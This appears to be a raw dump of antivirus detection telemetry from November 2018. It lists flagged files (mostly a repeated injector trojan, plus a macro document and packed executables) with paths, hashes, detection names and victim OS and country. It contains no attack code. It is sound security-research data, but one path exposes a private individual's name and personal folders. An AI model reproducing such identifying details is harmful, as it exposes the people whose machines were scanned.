  Row(detection=Row(filename='avscan-20181102-061334-664d08c3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061334-664D08C3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pdf tender document.tar --> j111.exe', filepath='pdf TENDER DOCUMENT.tar --> J111.exe', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T02:06:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp000008ea', filepath='C:\\Windows\\Temp\\tmp00000098\\tmp000008ea', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T19:44:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062302-b897d905', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062302-B897D905', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:23:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052227-41e299b0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052227-41E299B0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052705-e7a129fd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052705-E7A129FD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060409-159a785e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060409-159A785E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060555-549a9d32', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060555-549A9D32', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055335-9b7ae590', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055335-9B7AE590', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051634-6fcaaacf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051634-6FCAAACF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051020-91099b4b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051020-91099B4B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:10:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061813-0c8a71d0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061813-0C8A71D0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052119-19bcba47', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052119-19BCBA47', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062402-dcc88574', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062402-DCC88574', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055041-3395efc0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055041-3395EFC0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052751-0320219d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052751-0320219D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061101-0ac2ed17', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061101-0AC2ED17', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062049-694542f7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062049-694542F7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053007-5425a1a7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053007-5425A1A7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061727-f0db4c4e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061727-F0DB4C4E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060631-6a1820c7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060631-6A1820C7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:06:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052019-f5d53fa4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052019-F5D53FA4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:20:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052717-eefdc4c2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052717-EEFDC4C2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053232-aa8caa97', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053232-AA8CAA97', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053032-636998ef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053032-636998EF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060837-b559c9b5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060837-B559C9B5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050944-7b6b03b9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050944-7B6B03B9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060542-4d031f75', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060542-4D031F75', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060048-9d9f601b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060048-9D9F601B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055757-37729f98', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055757-37729F98', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050504-d49a22cc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050504-D49A22CC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055724-243bb374', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055724-243BB374', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050624-043f53e8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050624-043F53E8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gyrating.exe', filepath='C:\\Program Files\\Plotless\\gyrating.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='854a44b5d6807b06b6495e1641305bbdaef2ff103ffadfb6b9dc30f0f9b63363', metadata=Row(cmdline='beaal', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Plotless\\gyrating.exe', parentsize=384000, timestamp='2018-11-02T01:35:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052556-bef058dd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052556-BEF058DD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054413-4c8fc97d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054413-4C8FC97D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054334-350905cc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054334-350905CC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060927-d32db568', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060927-D32DB568', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051441-2c148727', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051441-2C148727', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T14:24:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062623-304ba2c7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062623-304BA2C7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T03:21:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050842-568ce843', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050842-568CE843', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062109-75a7066f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062109-75A7066F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055823-4741a74e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055823-4741A74E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054830-e5e3f534', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054830-E5E3F534', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053431-f17cda65', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053431-F17CDA65', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054447-60a52df6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054447-60A52DF6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T06:35:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='htexport.dll', filepath='\\\\?\\E:\\Trekstor_17.05.2015\\Anja\\46486478\\AAAAAAAAAAAAAAAAAAAAAAAAAaaaaa\\Festplatte\\Anja Rüegsegger\\Rüegsegger Privat\\WINHEIZ\\HEIZTECH\\HTEXPORT.dll', filesize=2160000, name='HEUR/APC.#M1.#R1'), hash='776b340025477da9fcf7289ee39feffee89f184b6185e01352448e08ed72fad7', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:17:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T16:46:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060232-db71f76f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060232-DB71F76F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055926-6c95a656', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055926-6C95A656', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dwh92a5', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWH92A5', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:43:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='thr 2015.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\LPA\\ESTIMASI THR 2015\\THR 2015.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:32Z'), dt=datetime.date(2018, 11, 1)),
